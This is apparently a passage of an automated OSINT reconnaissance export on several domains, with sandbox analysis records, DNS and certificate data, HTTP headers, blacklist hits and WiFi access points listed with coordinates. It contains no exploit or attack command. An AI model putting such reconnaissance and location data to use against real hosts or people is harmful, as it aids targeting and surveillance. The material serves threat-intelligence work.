u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001016]\n "CabB29F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB29F.tmp]- [targetUID: 00000000-00001016]\n "CabB230.tmp" has type "Microsoft Cabinet archive data Windows 
2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB230.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "TarB2B0.tmp" has type "data"- Location: [%TEMP%\\TarB2B0.tmp]- [targetUID: 00000000-00001016]\n "KFOlCnqEu92Fr1MmWUlvAA_1_.woff" has type "Web Open Font Format TrueType length 65556 version 1.1"- [targetUID: N/A]\n "KFOmCnqEu92Fr1Me5g_1_.woff" has type "Web Open Font Format TrueType length 65456 version 1.1"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001016]\n "particles.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003336]\n "logow_1_.png" has type "PNG image data 432 x 136 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DF497BB768EA621C59.TMP" has type "data"- Location: [%TEMP%\\~DF497BB768EA621C59.TMP]- [targetUID: 00000000-00003336]\n "~DF4FA1B0A9F3FF7EDF.TMP" has type "data"- Location: [%TEMP%\\~DF4FA1B0A9F3FF7EDF.TMP]- [targetUID: 00000000-00003336]\n "~DFBC1F098CB0C585CC.TMP" has type "data"- Location: [%TEMP%\\~DFBC1F098CB0C585CC.TMP]- [targetUID: 00000000-00003336]\n "RecoveryStore._3D4AE533-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document 
File V2 Document Cannot read section info"- [targetUID: N/A]\n "_3D4AE535-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_475EE3B6-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "VOPKN6EE.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\VOPKN6EE.htm]- [targetUID: 00000000-00001016]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "FSNCEO3Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FSNCEO3Q.txt]- [targetUID: 00000000-00003336]\n "FF4BO7D3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FF4BO7D3.txt]- [targetUID: 00000000-00003336]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://traderai.space/"\n Pattern match: "https://traderai.space"\n Pattern match: "MUIDB12A5A57128306EB03399B786297C6F47ieonline.microsoft.com/9216229494092831106132106127659431027661*"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUID1E300F3F0C876CC339721DC80D036D95msn.com/1025229494092831106132106830784431027661*"\n Pattern match: 
"isdomainmigratedtruewww.msn.com/1025318836044831063887106783909431027661*"\n Pattern match: "www.msn.com/"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "http://opensource.org/licenses/MIT/*"\n Heuristic match: "/* Author : Vincent Garreau - vincentgarreau.com"\n Pattern match: "http://opensource.org/licenses/MIT"\n Pattern match: "vincentgarreau.com/particles.js"\n Pattern match: "github.com/VincentGarreau/particles.js"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*MUID12A5A57128306EB03399B786297C6F47microsoft.com/1025229494092831106132106127659431027661*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*MUID12A5A57128306EB03399B786297C6F47microsoft.com/1025229494092831106132106127659431027661*_EDGE_V1microsoft.com/9216229494092831106132106158909431027661*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff"\n Pattern match: "https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap"\n Pattern match: "https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"\n Pattern match: "https://threejs.org/examples/js/libs/stats.min.js"\n Heuristic match: "cdn.jsdelivr.net"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "fonts.gstatic.com"\n Heuristic match: "threejs.org"\n Pattern match: "https://traderai.space/Accept-Language"\n Pattern 
match: "particles.js/2.0.0/particles.min.js"\n Pattern match: "https://csp.withgoogle.com/csp/apps-themesCross-Origin-Resource-Policy"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http:// | 185.199.111.153 |
| 2023-05-12 02:45:48 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Chicago, Illinois, 60666, United States, North America | 104.21.6.166 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:70) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:48 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
|
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 002evapey.github.io |
| 2023-05-12 03:10:00 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | shop.telleria.com | 165.232.113.92 |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 0.church | 0.church |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.84 | 34.74.170.74 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://oldfluid.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
</style>
</head>
<body>
<canvas></canvas>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wavelan network (Net ID: 00:02:2D:0D:63:6F) | 34.0544, -118.244 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57480ebf7f3732-FRA
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | DevOps - DevOps is a methodology in the software development and IT industry. Used as a set of practices and tools, DevOps integrates and automates the work of software development and IT operations as a means for improving and shortening the systems development life cycle. | cdn-185-199-111-153.github.com |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:443 | 188.114.97.0/24 |
| 2023-05-12 02:56:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://voyageplay.ai/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar32FA.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bf8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bf8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bf8_IESQMMUTEX_0_519"\n "IsoScope_bf8_ConnHashTable<3064>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bf8_IESQMMUTEX_0_303"\n 
"Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_bf8_IE_EarlyTabStart_0xb78_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3064"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3064"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab32F9.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002976]\n "~DF0102A8D036D93BAD.TMP" has type "data"- Location: [%TEMP%\\~DF0102A8D036D93BAD.TMP]- [targetUID: 00000000-00003064]\n "~DF6DA11E7760B49E9F.TMP" has type "data"- Location: [%TEMP%\\~DF6DA11E7760B49E9F.TMP]- [targetUID: 00000000-00003064]\n "RecoveryStore._D53E7D97-1CF4-11ED-96A5-080027F708E5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar32FA.tmp" has type "data"- 
Location: [%TEMP%\\Tar32FA.tmp]- [targetUID: 00000000-00002976]\n "J0CXAHLN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0CXAHLN.txt]- [targetUID: 00000000-00003064]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003064]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002976]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003064]\n "9F4E7D2B4E1791C98BAE1536D04998B0" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9F4E7D2B4E1791C98BAE1536D04998B0]- [targetUID: 00000000-00002976]\n "RM4WKYJ5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RM4WKYJ5.txt]- [targetUID: 00000000-00003064]\n "_593C2B6E-1CF7-11ED-96A5-080027F708E5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab32F9.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab32F9.tmp]- [targetUID: 00000000-00002976]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003064]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003064]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: voyageplay.ai\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 11496\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 360\nContent-Type: application/octet-stream\nDate: Mon, 15 Aug 2022 22:26:27 GMT\nEtag: "03ac729a0a20f0fa736f8d32597e40d7-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GAJ4SY0PCVKT6ZTGE83ZQNQ2\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-192x192.png",\n "sizes": "192x192",\n "type": "image/png"\n },\n {\n "src": "/android-chrome-512x512.png",\n "sizes": "512x512",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"- [Source: SSL_104.196.30.220]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: voyageplay.ai\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n 
| 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Chris (Net ID: 00:1D:D1:A7:3B:10) | 32.8608, -79.9746 |
| 2023-05-12 02:56:54 | IPv6 Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709 | www.ayhu.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 000.lt | 000.lt |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-109-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-109-154.github.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Mariner (Net ID: 00:14:C1:0D:F8:10) | 40.2024, 29.0398 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.153): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 123.97.148.34.bc.googleusercontent.com | 34.148.97.123 |
